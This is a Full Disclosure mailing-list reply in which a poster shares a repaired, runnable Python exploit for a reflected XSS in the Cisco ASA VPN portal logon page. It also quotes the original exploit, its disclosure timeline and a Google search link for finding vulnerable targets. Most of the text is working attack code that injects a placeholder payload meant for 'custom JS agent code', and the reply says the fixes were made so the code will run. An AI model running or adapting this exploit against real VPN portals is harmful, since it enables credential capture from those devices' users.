Re: Cisco ASA VPN - Zero Day Exploit

[Joey Maresca <jmaresca () gmail com>]

For folks who want code that runs, I did you all a favor, fixed the ident
issues, removed unused libraries, fixed SSL certificate validation checks
causing failures, fixed typos that prevent running, killed dead code, made
sure it actually used the Port input. All while stripping out the
unnecessary fluff. It may not be perfect but it will at least now run.


import string, sys
import ssl, socket, httplib

if __name__ == '__main__':
        try:
                Target = sys.argv[1]
                Port = int(sys.argv[2])
                # Here goes your custom JS agent code
                Payload = "alert(1)"
                VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
                CraftedRequest = VulnerableURL

                # Start the connection
                connection =
httplib.HTTPSConnection(Target,Port,context=ssl._create_unverified_context())
                connection.request('GET', CraftedRequest)
                Response = connection.getresponse()
                print "Server status response:", Response.status,
Response.reason
                data = Response.read()
                vulnerable = "Target is not vulnerable"

                for line in str(data).splitlines():
                        if "juansacco" in line:
                                vulnerable = "Targer is vulnerable"
                        if vulnerable != "Not vulnerable":
                                print "Result of the test:", vulnerable

                # Find the injection on the response
                connection.close()

        except Exception,e:
                print "Exploit connection closed " + str(e)

On Wed, Feb 17, 2016 at 4:11 AM, Juan Sacco <juansacco () gmail com> wrote:

> # Exploit author: Juan Sacco - jsacco () exploitpack com
> # Affected program: Cisco ASA VPN Portal - Zero Day
> # Cisco ASA VPN is prone to a XSS on the password recovery page.
> # This vulnerability can be used by an attacker to capture other user's
> credentials.
> # The password recovery form fails to filter properly the hidden inputs
> fields.
> #
> # This Zero Day exploit has been developed and discovered by Juan Sacco.
> # Exploit Pack - Team http://exploitpack.com
> #
> # Release Dates:
> # Reported to Cisco PSIRT Feb 4/2016
> # Cisco Dev Team working on a fix Feb 15/2016
> # Cisco PSIRT report a CVE Feb 15/2016
> # Exploit Pack disclose the bug Feb 15/2016
> # Disclosure of the Exploit Feb 16/2016
> #
> # Look for vulnerable targets here:
> https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
> # More than 18.000 results in Google only
>
> import string, sys
> import socket, httplib
> import telnetlib
>
> def run():
>    try:
>     Target = sys.argv[1]
> Port = int(sys.argv[2])
> # Here goes your custom JS agent code
> Payload = "alert(1)"
> VulnerableURL =
>
> "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
> + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
> CraftedRequest = VulnerableURL
>   # Start the connection
> connection = httplib.HTTPSConnection(Target)
> connection.request('GET', CraftedRequest)
> Response = connection.getresponse()
> print "Server status response:", Response.status, Response.reason
> data =  Response.read()
> vulnerable = "Target is not vulnerable"
> for line in str(data).splitlines():
> if "juansacco\\\"" in line:
> vulnerable = "Targer is vulnerable"
> if vulnerable != "Not vulnerable":
> print "Result of the test:", vulnerable
> # Find the injection on the response
> connection.close()
>    except Exception,e:
>      print "Exploit connection closed " + str(e)
>
> if __name__ == '__main__':
>    print "Cisco VPN ASA Exploit - Zero Day"
>    print "################################"
>    print "Author: Juan Sacco - jsacco () exploitpack com"
>
>    try:
>      Target = sys.argv[1]
>      Port = sys.argv[2]
>    except IndexError:
>      pass
> run()
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/